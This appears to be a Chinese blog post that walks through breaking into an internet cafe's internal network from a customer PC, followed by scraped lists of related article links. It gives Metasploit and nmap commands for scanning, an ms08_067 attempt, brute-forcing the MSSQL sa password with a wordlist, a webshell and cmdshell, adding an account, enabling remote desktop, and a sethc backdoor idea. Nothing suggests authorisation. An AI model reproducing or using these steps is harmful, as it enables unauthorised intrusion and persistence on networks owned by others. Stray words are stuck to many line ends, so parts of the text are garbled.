网吧内网渗透
0X01 准备
vmware,Kali linux,啊D网络工具包linux
0x02 初探
我上网的这台电脑IP是192.168.21.128sql
先使用kali linux虚拟机对整个网络进行扫描!shell
然发现192.168.1.1 开放了23 telnet 端口!(为何只扫到了1.x网段呢?)详解移步windows
以前是打算用armitage,可是不知道为何一直链接不上!网络
用啊D直接对整个网络进行扫描 192.168.1.0-192.168.255.255工具
过了漫长的时间,扫出192.168.3.99 开放了445 端口get
打开kali 用msf进行一下深刻扫描(smb_version 协议扫描)cmd
首先启动msf虚拟机
msfconsoleit
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set RHOST 192.168.3.99
run
以后咱们会发现系统版本和补丁信息
windows XP sp3
而后再利用ms08_067对目标进行一次攻击
然而咱们想的太简单了,攻击失败,没有返回目标的shell
对目标进行一次隐秘的端口扫描
db_nmap -sS -Pn 192.168.3.99
发现1433端口开放
使用msf下的mssql_login破解sa的密码
search mssql_login
use 破解脚本
set PASS_FILE /usr/share/wordlists/rockyou.txt
set RHOST 192.168.3.99
exploit
图上看到的
[+] 192.168.3.99:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456
密码出来了, 123456
咱们再加载一个 payload
以下图
msf 并无为攻击者返回 meterpreter 会话
那么咱们就手工来获取对方权限
首先下载一个 aspx 本地环境
弄一个 aspx 大马
输入 mssql 目标和帐户密码进行连接
建立 cmdshell
执行系统命令
添加帐户,开启 3389 以后,考虑到对方是 xp 便没有登陆
能够考虑劫持 sethc 或者其余后门程序!
以上操做请往下看图
- 1. 内网渗透
- 2. 内网渗透 局域网后渗透
- 3. metasploit内网渗透
- 4. 内网渗透--windows
- 5. 【渗透技巧】内网渗透思路
- 6. 后渗透——内网转发
- 7. MSF 内网渗透(案例)
- 8. nps内网渗透利用
- 9. 内网渗透梳理
- 10. 提权与内网渗透
- 更多相关文章...
- • 网站 域名 - 网站主机教程
- • ionic 网格(Grid) - ionic 教程
- • 互联网组织的未来:剖析GitHub员工的任性之源
- • 三篇文章了解 TiDB 技术内幕——说存储
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 内网渗透
- 2. 内网渗透 局域网后渗透
- 3. metasploit内网渗透
- 4. 内网渗透--windows
- 5. 【渗透技巧】内网渗透思路
- 6. 后渗透——内网转发
- 7. MSF 内网渗透(案例)
- 8. nps内网渗透利用
- 9. 内网渗透梳理
- 10. 提权与内网渗透